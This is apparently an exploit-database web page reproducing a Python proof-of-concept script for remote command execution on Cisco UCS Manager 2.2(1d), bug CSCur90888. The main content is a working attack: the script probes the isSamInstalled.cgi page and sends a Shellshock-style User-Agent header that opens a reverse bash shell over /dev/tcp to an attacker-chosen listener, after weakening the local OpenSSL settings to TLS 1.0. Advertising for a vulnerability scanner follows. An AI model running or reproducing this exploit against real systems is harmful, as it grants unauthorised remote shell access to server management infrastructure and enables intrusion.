cisco ucs manager 2.2(1d) remote command execution

▸▸▸ Exploit & Vulnerability >>   webapps exploit & hardware vulnerability




cisco ucs manager 2.2(1d) remote command execution Code Code...
				
# Exploit Title: Cisco UCS Manager 2.2(1d) - Remote Command Execution # Description: An unspecified CGI script in Cisco FX-OS before 1.1.2 on Firepower 9000 devices and Cisco Unified Computing System (UCS) Manager before 2.2(4b), 2.2(5) before 2.2(5a), and 3.0 before 3.0(2e) allows remote attackers to execute arbitrary shell commands via a crafted HTTP request, aka Bug ID CSCur90888. # Date: 1/15/2021 # Exploit Author: liquidsky (J.McPeters) # Vulnerable Software: Cisco UCS Manager - 2.2(1d) -> [According to the vendor (cisco), this is known to impact versions prior to 3.0(2e).] # Vendor Homepage : https://www.cisco.com/c/en/us/products/servers-unified-computing/ucs-manager/index.html # Version: 2.2(1d), 2.2(3c)A # Cisco Reference: https://quickview.cloudapps.cisco.com/quickview/bug/CSCur90888 # Tested On: Cisco UCS Manager - 2.2(1d) (Exploit ran with Debian 5.6.7-1kali1 (Kali 2020.1 x64)) # Author Site: https://github.com/fuzzlove/Cisco-UCS-Manager-2.2-1d-Remote-Command-Execution # Special Notes: This application by default uses outdated TLS 1.0 for communication, so thats why there is a quickfix/temporary patch to 1.0 in openssl utilizing 'sed' (that gets changes back after exploitation). # # Greetz: wetw0rk, Fr13ndz, O.G.Xx25, MS, SS, JK, the S3 family, and last but NOT least droppunx ^_~ # import sys, ssl, os, time import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(InsecureRequestWarning) print "+-------------------------------------------------------------+" print print "- Cisco Unified Computing System Manager CGI RCE " print print " Cisco UCS Manager - 2.2(1d)" print print "- PoC by: LiquidSky - 1/15/21 | CISCO-BUG-ID: CSCur90888 " print print "+-------------------------------------------------------------+" try: target = sys.argv[1] shellip = sys.argv[2] shellport = sys.argv[3] except IndexError: print print "- Usage: %s <vuln-site> <listener-ip> <listener-port>" % sys.argv[0] print "- Example: %s https://ciscoucsmgr 192.168.1.123 443" % sys.argv[0] print sys.exit() def ch3x_w00t(): if os.geteuid()==0: print "[*] Running exploit as root." else: print "[!] You are not root, be sure you can change /etc/ssl/openssl.cnf" print "[x] Most likely going to see an error..." time.sleep(5) # Performs backup of openssl.cnf just in case and performs checks of existing vulnerable pages... def cisco_vuln(): ch3x_w00t() print "[x] Backing up /etc/ssl/openssl.cnf to /etc/ssl/openssl.bak (just in case)" os.system("cp /etc/ssl/openssl.cnf /etc/ssl/openssl.bak") os.system("sed -i 's/MinProtocol = TLSv1.2/MinProtocol = TLSv1.0/' /etc/ssl/openssl.cnf") print "[*] Checking vulnerable URL " headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} cisco_url = "" + target + "/ucsm/isSamInstalled.cgi" #Checking page check = requests.get(cisco_url, headers=headers1, verify=False) #Grabbing response res = check.text if "true" in res: return True return False # Safety check - make sure the user is okay with the TLS1.0 temp fix # Shout out to Dean ^^ for keeping me polite... def exploit_question(): print "[x] Warning the service by default uses TLS1.0 so . . ." print print "[?] This exploit temporarily patches '/etc/ssl/openssl.cnf' to use TLS1.0 using 'sed' and then changes back to TLS1.2" print print "[!] A backup is placed in /etc/ssl/openssl.bak just to be safe..." print question = raw_input('[!] Do you wish to continue, "yes" or "no" ?') if question == 'yes': print print "[!] Great attempting exploitation checks: " + target + '!' cisco_vuln() else: print print "[x] Stay safe m8 ;) - Read the source, its safe . . " print sys.exit() exploit_question() def cisco_response(): headers1 = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} cisco_url = "" + target + "/ucsm/isSamInstalled.cgi" request = requests.get(cisco_url, headers=headers1, verify=False) if request.status_code == 200: print "[x] Page seems to exist -- Possibly vulnerable?" else: print "[!] Page does not exist - Not vulnerable" print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)" os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf") sys.exit() def cisco_exploit(): cisco_url = "" + target + "/ucsm/isSamInstalled.cgi" headers = {"User-Agent": "() { ignored;};/bin/bash -i >& /dev/tcp/" + shellip + "/" + shellport + " 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"} print "[x] Sending Shell to IP: " + shellip + " Port: " + shellport + "" print "[?] If this works you will see the exploit hang" requests.get(cisco_url, headers=headers, verify=False) print "[!] Shell Sent" cisco_exploit() def main(): if cisco_vuln(): print "" print "[+] Perhaps success?" print "" print " ^_~ got shellz? - [ liquidsky | 2021 ]" print print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)" os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf") else: print "[-] failure!" print "[x] Switching back to TLS v1.2 - backup file should be in /etc/ssl/openssl.bak (just in case)" os.system("sed -i 's/MinProtocol = TLSv1.0/MinProtocol = TLSv1.2/' /etc/ssl/openssl.cnf") if __name__ == "__main__": main()


Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.